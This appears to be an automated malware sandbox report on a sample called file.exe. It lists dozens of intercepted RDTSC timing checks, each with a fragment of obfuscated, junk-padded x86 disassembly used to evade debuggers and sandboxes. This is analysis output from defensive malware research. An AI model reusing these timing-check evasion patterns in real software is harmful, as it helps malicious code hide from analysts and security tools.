                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30BD6 second address: 4A30BEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edx 0x00000005 mov edx, ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov ebp, esp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ax, dx 0x00000012 push ebx 0x00000013 pop esi 0x00000014 popad 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30DAB second address: 4A30DB1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30DB1 second address: 4A30DB5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30DB5 second address: 4A30DB9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A30DB9 second address: 4A30E09 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov ebp, esp 0x0000000a pushad 0x0000000b pushfd 0x0000000c jmp 00007FFAACBEF8CCh 0x00000011 jmp 00007FFAACBEF8D5h 0x00000016 popfd 0x00000017 push eax 0x00000018 push edx 0x00000019 pushfd 0x0000001a jmp 00007FFAACBEF8CEh 0x0000001f sbb cx, 4148h 0x00000024 jmp 00007FFAACBEF8CBh 0x00000029 popfd 0x0000002a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A600C2 second address: 4A60158 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F1Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 test eax, eax 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FFAAD0A8F1Eh 0x00000012 xor ecx, 489471A8h 0x00000018 jmp 00007FFAAD0A8F1Bh 0x0000001d popfd 0x0000001e pushfd 0x0000001f jmp 00007FFAAD0A8F28h 0x00000024 adc cx, E408h 0x00000029 jmp 00007FFAAD0A8F1Bh 0x0000002e popfd 0x0000002f popad 0x00000030 je 00007FFB1F57C75Bh 0x00000036 jmp 00007FFAAD0A8F26h 0x0000003b mov ecx, eax 0x0000003d push eax 0x0000003e push edx 0x0000003f jmp 00007FFAAD0A8F27h 0x00000044 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60158 second address: 4A601CD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xor eax, dword ptr [ebp+08h] 0x0000000c jmp 00007FFAACBEF8D7h 0x00000011 and ecx, 1Fh 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FFAACBEF8D4h 0x0000001b sub ax, 8D88h 0x00000020 jmp 00007FFAACBEF8CBh 0x00000025 popfd 0x00000026 push ecx 0x00000027 push ebx 0x00000028 pop ecx 0x00000029 pop edi 0x0000002a popad 0x0000002b ror eax, cl 0x0000002d push eax 0x0000002e push edx 0x0000002f pushad 0x00000030 mov dx, 11CEh 0x00000034 mov ebx, 20D17CDAh 0x00000039 popad 0x0000003a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A601CD second address: 4A601E8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F20h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 leave 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A601E8 second address: 4A601EC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A601EC second address: 4A601F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A601F0 second address: 4A601F6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A601F6 second address: 4A60255 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop edi 0x00000005 push eax 0x00000006 pop edx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a retn 0004h 0x0000000d nop 0x0000000e mov esi, eax 0x00000010 lea eax, dword ptr [ebp-08h] 0x00000013 xor esi, dword ptr [00DC2014h] 0x00000019 push eax 0x0000001a push eax 0x0000001b push eax 0x0000001c lea eax, dword ptr [ebp-10h] 0x0000001f push eax 0x00000020 call 00007FFAB0D89129h 0x00000025 push FFFFFFFEh 0x00000027 pushad 0x00000028 push ecx 0x00000029 movsx ebx, ax 0x0000002c pop ecx 0x0000002d mov ebx, 23F97E42h 0x00000032 popad 0x00000033 pop eax 0x00000034 push eax 0x00000035 push edx 0x00000036 pushad 0x00000037 call 00007FFAAD0A8F22h 0x0000003c pop eax 0x0000003d pushfd 0x0000003e jmp 00007FFAAD0A8F1Bh 0x00000043 and esi, 2C2E19EEh 0x00000049 jmp 00007FFAAD0A8F29h 0x0000004e popfd 0x0000004f popad 0x00000050 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60255 second address: 4A60265 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAACBEF8CCh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60265 second address: 4A60269 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60269 second address: 4A602E6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 ret 0x00000009 nop 0x0000000a push eax 0x0000000b call 00007FFAB08CFB41h 0x00000010 mov edi, edi 0x00000012 jmp 00007FFAACBEF8D7h 0x00000017 xchg eax, ebp 0x00000018 pushad 0x00000019 jmp 00007FFAACBEF8D4h 0x0000001e push ecx 0x0000001f pop eax 0x00000020 popad 0x00000021 push eax 0x00000022 pushad 0x00000023 pushad 0x00000024 pushfd 0x00000025 jmp 00007FFAACBEF8D2h 0x0000002a adc al, 00000058h 0x0000002d jmp 00007FFAACBEF8CBh 0x00000032 popfd 0x00000033 popad 0x00000034 popad 0x00000035 xchg eax, ebp 0x00000036 jmp 00007FFAACBEF8D2h 0x0000003b mov ebp, esp 0x0000003d push eax 0x0000003e push edx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A602E6 second address: 4A602EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A602EA second address: 4A60307 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A60307 second address: 4A6037C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ebp 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d pushfd 0x0000000e jmp 00007FFAAD0A8F23h 0x00000013 sbb eax, 0C09678Eh 0x00000019 jmp 00007FFAAD0A8F29h 0x0000001e popfd 0x0000001f pushfd 0x00000020 jmp 00007FFAAD0A8F20h 0x00000025 jmp 00007FFAAD0A8F25h 0x0000002a popfd 0x0000002b popad 0x0000002c rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10008 second address: 4A1000C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1000C second address: 4A10012 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10012 second address: 4A10018 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10018 second address: 4A1001C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1001C second address: 4A1003E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, ebp 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FFAACBEF8D7h 0x00000010 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1003E second address: 4A10074 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edi 0x00000004 pop eax 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 jmp 00007FFAAD0A8F1Ch 0x0000000e xchg eax, ebp 0x0000000f jmp 00007FFAAD0A8F20h 0x00000014 mov ebp, esp 0x00000016 push eax 0x00000017 push edx 0x00000018 push eax 0x00000019 push edx 0x0000001a jmp 00007FFAAD0A8F1Ah 0x0000001f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10074 second address: 4A1007A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1007A second address: 4A10080 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10080 second address: 4A10084 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10084 second address: 4A10138 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 and esp, FFFFFFF8h 0x0000000b pushad 0x0000000c movzx eax, dx 0x0000000f call 00007FFAAD0A8F27h 0x00000014 mov ah, 34h 0x00000016 pop edx 0x00000017 popad 0x00000018 xchg eax, ecx 0x00000019 pushad 0x0000001a mov dh, al 0x0000001c popad 0x0000001d push eax 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FFAAD0A8F25h 0x00000025 and cl, 00000016h 0x00000028 jmp 00007FFAAD0A8F21h 0x0000002d popfd 0x0000002e movzx esi, di 0x00000031 popad 0x00000032 xchg eax, ecx 0x00000033 jmp 00007FFAAD0A8F23h 0x00000038 xchg eax, ebx 0x00000039 pushad 0x0000003a pushfd 0x0000003b jmp 00007FFAAD0A8F24h 0x00000040 sub esi, 5C6E3F98h 0x00000046 jmp 00007FFAAD0A8F1Bh 0x0000004b popfd 0x0000004c mov bx, ax 0x0000004f popad 0x00000050 push eax 0x00000051 push eax 0x00000052 push edx 0x00000053 jmp 00007FFAAD0A8F20h 0x00000058 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10138 second address: 4A10157 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAACBEF8D1h 0x00000008 mov edx, ecx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d xchg eax, ebx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10157 second address: 4A10161 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, 3DB94458h 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10161 second address: 4A101B4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8CEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov ebx, dword ptr [ebp+10h] 0x0000000c jmp 00007FFAACBEF8D0h 0x00000011 xchg eax, esi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 pushfd 0x00000016 jmp 00007FFAACBEF8CDh 0x0000001b xor ecx, 18BAE2A6h 0x00000021 jmp 00007FFAACBEF8D1h 0x00000026 popfd 0x00000027 mov di, ax 0x0000002a popad 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A101B4 second address: 4A10258 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F1Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b jmp 00007FFAAD0A8F27h 0x00000010 pushfd 0x00000011 jmp 00007FFAAD0A8F28h 0x00000016 jmp 00007FFAAD0A8F25h 0x0000001b popfd 0x0000001c popad 0x0000001d xchg eax, esi 0x0000001e pushad 0x0000001f push eax 0x00000020 call 00007FFAAD0A8F23h 0x00000025 pop eax 0x00000026 pop edx 0x00000027 mov eax, 0B254805h 0x0000002c popad 0x0000002d mov esi, dword ptr [ebp+08h] 0x00000030 pushad 0x00000031 pushfd 0x00000032 jmp 00007FFAAD0A8F1Eh 0x00000037 sub al, FFFFFF98h 0x0000003a jmp 00007FFAAD0A8F1Bh 0x0000003f popfd 0x00000040 mov dl, al 0x00000042 popad 0x00000043 push ecx 0x00000044 push eax 0x00000045 push edx 0x00000046 push eax 0x00000047 push edx 0x00000048 push eax 0x00000049 push edx 0x0000004a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10258 second address: 4A1025C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1025C second address: 4A10279 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10279 second address: 4A10282 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, 4F72h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10282 second address: 4A1033A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov dword ptr [esp], edi 0x0000000a jmp 00007FFAAD0A8F1Fh 0x0000000f test esi, esi 0x00000011 pushad 0x00000012 mov ecx, 78C0D22Bh 0x00000017 mov eax, 6A786607h 0x0000001c popad 0x0000001d je 00007FFB1F5C7282h 0x00000023 jmp 00007FFAAD0A8F1Ah 0x00000028 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000002f jmp 00007FFAAD0A8F20h 0x00000034 je 00007FFB1F5C7271h 0x0000003a pushad 0x0000003b push esi 0x0000003c mov dx, 2D00h 0x00000040 pop edx 0x00000041 pushad 0x00000042 mov edi, ecx 0x00000044 pushfd 0x00000045 jmp 00007FFAAD0A8F20h 0x0000004a jmp 00007FFAAD0A8F25h 0x0000004f popfd 0x00000050 popad 0x00000051 popad 0x00000052 mov edx, dword ptr [esi+44h] 0x00000055 jmp 00007FFAAD0A8F1Eh 0x0000005a or edx, dword ptr [ebp+0Ch] 0x0000005d pushad 0x0000005e mov eax, 35C047FDh 0x00000063 jmp 00007FFAAD0A8F1Ah 0x00000068 popad 0x00000069 test edx, 61000000h 0x0000006f push eax 0x00000070 push edx 0x00000071 push eax 0x00000072 push edx 0x00000073 pushad 0x00000074 popad 0x00000075 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1033A second address: 4A10357 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10357 second address: 4A1036C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx ebx, si 0x00000006 mov di, cx 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jne 00007FFB1F5C723Bh 0x00000012 pushad 0x00000013 push eax 0x00000014 push edx 0x00000015 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A1036C second address: 4A103DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushfd 0x00000005 jmp 00007FFAACBEF8D8h 0x0000000a or ax, 64C8h 0x0000000f jmp 00007FFAACBEF8CBh 0x00000014 popfd 0x00000015 popad 0x00000016 test byte ptr [esi+48h], 00000001h 0x0000001a push eax 0x0000001b push edx 0x0000001c pushad 0x0000001d mov cx, bx 0x00000020 pushfd 0x00000021 jmp 00007FFAACBEF8D7h 0x00000026 sbb cx, DBBEh 0x0000002b jmp 00007FFAACBEF8D9h 0x00000030 popfd 0x00000031 popad 0x00000032 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A103DD second address: 4A103ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAAD0A8F1Ch 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A103ED second address: 4A103F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00862 second address: 4A00866 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00866 second address: 4A00914 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp], ebp 0x0000000a pushad 0x0000000b mov bx, cx 0x0000000e pushfd 0x0000000f jmp 00007FFAACBEF8D6h 0x00000014 adc eax, 248C1FC8h 0x0000001a jmp 00007FFAACBEF8CBh 0x0000001f popfd 0x00000020 popad 0x00000021 mov ebp, esp 0x00000023 jmp 00007FFAACBEF8D6h 0x00000028 and esp, FFFFFFF8h 0x0000002b pushad 0x0000002c call 00007FFAACBEF8CEh 0x00000031 pushfd 0x00000032 jmp 00007FFAACBEF8D2h 0x00000037 add ecx, 66CAD488h 0x0000003d jmp 00007FFAACBEF8CBh 0x00000042 popfd 0x00000043 pop eax 0x00000044 mov bh, F2h 0x00000046 popad 0x00000047 xchg eax, ebx 0x00000048 jmp 00007FFAACBEF8D0h 0x0000004d push eax 0x0000004e push eax 0x0000004f push edx 0x00000050 push eax 0x00000051 push edx 0x00000052 jmp 00007FFAACBEF8CDh 0x00000057 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00914 second address: 4A00929 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F21h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00929 second address: 4A0094E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007FFAACBEF8CDh 0x00000011 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0094E second address: 4A00997 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov al, dh 0x00000005 pushfd 0x00000006 jmp 00007FFAAD0A8F28h 0x0000000b xor eax, 54707E08h 0x00000011 jmp 00007FFAAD0A8F1Bh 0x00000016 popfd 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a xchg eax, esi 0x0000001b pushad 0x0000001c movzx esi, di 0x0000001f push ebx 0x00000020 mov al, E9h 0x00000022 pop ebx 0x00000023 popad 0x00000024 push eax 0x00000025 push eax 0x00000026 push edx 0x00000027 pushad 0x00000028 push esi 0x00000029 pop ebx 0x0000002a mov eax, 11E93D03h 0x0000002f popad 0x00000030 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00997 second address: 4A00A19 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop eax 0x00000005 mov al, dl 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a xchg eax, esi 0x0000000b pushad 0x0000000c pushfd 0x0000000d jmp 00007FFAACBEF8D8h 0x00000012 or eax, 1F311DF8h 0x00000018 jmp 00007FFAACBEF8CBh 0x0000001d popfd 0x0000001e pushad 0x0000001f pushfd 0x00000020 jmp 00007FFAACBEF8D6h 0x00000025 xor esi, 7CD2F858h 0x0000002b jmp 00007FFAACBEF8CBh 0x00000030 popfd 0x00000031 push eax 0x00000032 pop edi 0x00000033 popad 0x00000034 popad 0x00000035 mov esi, dword ptr [ebp+08h] 0x00000038 jmp 00007FFAACBEF8D2h 0x0000003d sub ebx, ebx 0x0000003f push eax 0x00000040 push edx 0x00000041 push eax 0x00000042 push edx 0x00000043 push eax 0x00000044 push edx 0x00000045 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A19 second address: 4A00A1D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A1D second address: 4A00A21 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A21 second address: 4A00A27 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A27 second address: 4A00A77 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FFAACBEF8CBh 0x00000008 pushfd 0x00000009 jmp 00007FFAACBEF8D8h 0x0000000e sbb ecx, 4B0D9C48h 0x00000014 jmp 00007FFAACBEF8CBh 0x00000019 popfd 0x0000001a popad 0x0000001b pop edx 0x0000001c pop eax 0x0000001d test esi, esi 0x0000001f push eax 0x00000020 push edx 0x00000021 pushad 0x00000022 call 00007FFAACBEF8CBh 0x00000027 pop esi 0x00000028 pushad 0x00000029 popad 0x0000002a popad 0x0000002b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A77 second address: 4A00A86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFAAD0A8F1Bh 0x00000009 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00A86 second address: 4A00AC5 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b je 00007FFB1F1151AFh 0x00000011 jmp 00007FFAACBEF8CEh 0x00000016 cmp dword ptr [esi+08h], DDEEDDEEh 0x0000001d pushad 0x0000001e push eax 0x0000001f push edx 0x00000020 mov al, 48h 0x00000022 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00AC5 second address: 4A00B4F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAAD0A8F29h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a mov ecx, esi 0x0000000c pushad 0x0000000d jmp 00007FFAAD0A8F23h 0x00000012 mov bh, cl 0x00000014 popad 0x00000015 je 00007FFB1F5CE7BDh 0x0000001b pushad 0x0000001c pushfd 0x0000001d jmp 00007FFAAD0A8F21h 0x00000022 sub eax, 61263EE6h 0x00000028 jmp 00007FFAAD0A8F21h 0x0000002d popfd 0x0000002e mov bl, ah 0x00000030 popad 0x00000031 test byte ptr [76FB6968h], 00000002h 0x00000038 push eax 0x00000039 push edx 0x0000003a jmp 00007FFAAD0A8F26h 0x0000003f rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00B4F second address: 4A00BFE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push ebx 0x00000006 pop ecx 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jne 00007FFB1F115123h 0x00000010 jmp 00007FFAACBEF8D9h 0x00000015 mov edx, dword ptr [ebp+0Ch] 0x00000018 jmp 00007FFAACBEF8CEh 0x0000001d xchg eax, ebx 0x0000001e pushad 0x0000001f movsx edx, ax 0x00000022 popad 0x00000023 push eax 0x00000024 jmp 00007FFAACBEF8CFh 0x00000029 xchg eax, ebx 0x0000002a pushad 0x0000002b pushfd 0x0000002c jmp 00007FFAACBEF8D4h 0x00000031 add ecx, 03B6D4D8h 0x00000037 jmp 00007FFAACBEF8CBh 0x0000003c popfd 0x0000003d pushfd 0x0000003e jmp 00007FFAACBEF8D8h 0x00000043 sub cx, 9F38h 0x00000048 jmp 00007FFAACBEF8CBh 0x0000004d popfd 0x0000004e popad 0x0000004f xchg eax, ebx 0x00000050 push eax 0x00000051 push edx 0x00000052 pushad 0x00000053 push edi 0x00000054 pop ecx 0x00000055 mov dx, EFB2h 0x00000059 popad 0x0000005a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00BFE second address: 4A00C04 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C04 second address: 4A00C08 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C08 second address: 4A00C3B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c mov bh, cl 0x0000000e pushfd 0x0000000f jmp 00007FFAAD0A8F1Fh 0x00000014 jmp 00007FFAAD0A8F23h 0x00000019 popfd 0x0000001a popad 0x0000001b rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C3B second address: 4A00C6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFAACBEF8D9h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ebx 0x0000000a jmp 00007FFAACBEF8CEh 0x0000000f push dword ptr [ebp+14h] 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00C6F second address: 4A00C79 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edi, 4F79651Eh 0x00000009 popad 0x0000000a rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00D33 second address: 4A00D39 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00D39 second address: 4A00D3E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                    Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A10BB7 second address: 4A10BBB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
